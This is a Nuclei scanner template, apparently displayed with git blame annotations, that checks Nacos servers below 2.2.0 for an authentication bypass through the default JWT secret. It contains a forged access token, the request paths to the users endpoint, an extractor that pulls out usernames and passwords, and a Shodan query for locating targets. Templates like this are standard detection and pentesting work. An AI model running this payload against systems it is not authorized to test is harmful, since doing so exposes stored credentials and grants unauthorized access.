nuclei-templates/http/misconfiguration/nacos-authentication-bypass...

id: nacos-authentication-bypass

info:
  name: Nacos < 2.2.0 - Authentication Bypass
  author: Esonhugh
  severity: critical
  description: |
    The authentication function of Nacos is can be bypass through default JWT secret.
  reference:
    - https://github.com/alibaba/nacos/issues/10060
    - https://avd.aliyun.com/detail?id=AVD-2023-1655789
    - https://nacos.io/zh-cn/docs/auth.html
  remediation: Change value of jwt secret in the configurations
  metadata:
    max-request: 2
    verified: "true"
    shodan-query: title:"Nacos"
  tags: auth-bypass,nacos,misconfig,jwt

variables:
  token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g

http:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"username":'
          - '"password":'
        condition: and

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: extracted-credentials
        json:
          - ".pageItems[]"
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`id: nacos-authentication-bypass`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00
			`info:`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`name: Nacos < 2.2.0 - Authentication Bypass`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`author: Esonhugh`
			`severity: critical`
			`description: \|`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`The authentication function of Nacos is can be bypass through default JWT secret.`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`reference:`
			`- https://github.com/alibaba/nacos/issues/10060`
			`- https://avd.aliyun.com/detail?id=AVD-2023-1655789`
			`- https://nacos.io/zh-cn/docs/auth.html`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`remediation: Change value of jwt secret in the configurations`
metadata -update 2023-03-21 08:44:15 +00:00			`metadata:`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`max-request: 2`
metadata -update 2023-03-21 08:44:15 +00:00			`verified: "true"`
			`shodan-query: title:"Nacos"`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`tags: auth-bypass,nacos,misconfig,jwt`

			`variables:`
			`token: eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6OTk5OTk5OTk5OTl9.-isk56R8NfioHVYmpj4oz92nUteNBCN3HRd0-Hfk76g`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"`
			`- "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=10&accessToken={{token}}"`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`stop-at-first-match: true`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- '"username":'`
			`- '"password":'`
			`condition: and`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`- type: word`
			`part: header`
			`words:`
			`- "application/json"`

			`- type: status`
			`status:`
			`- 200`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`extractors:`
			`- type: json`
			`part: body`
update nacos bypass authentication 2023-03-21 08:34:06 +00:00			`name: extracted-credentials`
Add nacos default jwt secret bypass auth Template 2023-03-17 02:15:42 +00:00			`json:`
file name -update 2023-03-21 08:39:52 +00:00			`- ".pageItems[]"`